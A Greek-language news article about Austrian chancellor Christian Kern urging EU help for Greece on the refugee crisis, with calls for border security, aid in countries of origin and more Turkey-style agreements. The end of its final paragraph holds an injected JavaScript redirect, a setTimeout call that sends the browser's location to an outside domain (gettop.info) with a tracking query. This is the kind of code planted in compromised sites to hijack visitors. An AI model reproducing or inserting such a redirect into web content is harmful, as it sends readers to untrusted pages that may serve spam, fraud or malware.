Κερν: Πρέπει να βοηθήσουμε την Ελλάδα, αν και αντεπεξέρχεται

0
6

 

Ενόψει της Συνόδου Κορυφής στη Βιέννη για το προσφυγικό, ο καγκελάριος της Αυστρίας Κρίστιαν Κερν δίνει συνέντευξη στην αυστριακή Der Standard και τονίζει ότι αν και η Ελλάδα αντεπεξέρχεται στο προσφυγικό, η πίεση θα αυξηθεί και θα πρέπει να της παράσχουν βοήθεια.

Ο Αυστριακός καγκελάριος επισημαίνει ότι στη διάρκεια της Συνόδου όπου θα συμμετάσχει και ο Έλληνας πρωθυπουργός Αλέξης Τσίπρας, θα γίνει προσπάθεια να επιταχυνθεί η διαδικασία αποφάσεων στην ΕΕ και θα πρέπει από κοινού να καθοριστεί το πώς θα πρέπει να πραγματοποιείται η αυστηρή διασφάλιση των συνόρων και αυτό όχι μόνον στην Ελλάδα.

«Επειτα πρέπει να συζητήσουμε το πώς χειριζόμαστε την κατάσταση προ των πυλών της Ευρώπης, καθώς έχουμε ευθύνη για τους ανθρώπους που έρχονται και οι οποίοι είναι άνθρωποι και όχι μόνον κάποιοι αριθμοί, άνθρωποι με ανησυχίες και φόβους» υπογραμμίζει ο Κερν.

Όπως σημειώνει, το πρόβλημα με το μεταναστευτικό δεν θα έχει λυθεί αυτό το φθινόπωρο ούτε και το 2017 και θα πρέπει αυτό το πρόβλημα να εξεταστεί πλήρως στη βάση του, διότι διαφορετικά κανείς θα βρίσκεται πάντα ένα βήμα πίσω του, και αυτό επιβεβαιώθηκε στη Νέα Υόρκη στο πλαίσιο της Γενικής Συνέλευσης του ΟΗΕ.

Κατά την άποψή του, έως τώρα, έχουν γίνει πολύ λίγα και εκτός αυτού έγιναν πολύ αργά. Σύμφωνα με τον καγκελάριο, θα πρέπει να συζητηθεί το πώς θα διαρθρωθεί η βοήθεια επί τόπου, στις χώρες προέλευσης των προσφύγων και των μεταναστών, όπως επίσης θα πρέπει να βρεθούν επιπλέον εταίροι στο πρότυπο της συμφωνίας με την Τουρκία.

Ο ίδιος θεωρεί πως η μέριμνα για τους πρόσφυγες θα πρέπει κατά το δυνατόν να γίνεται κοντά στις χώρες προέλευσης και η Ευρώπη θα πρέπει ακόμη και να επενδύσει στην εκεί οικονομική ανάπτυξη, αυτό είναι απλό, και θα πρέπει να δημιουργηθούν οι προϋποθέσεις ώστε τέτοια προγράμματα βοήθειας να είναι εφικτά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here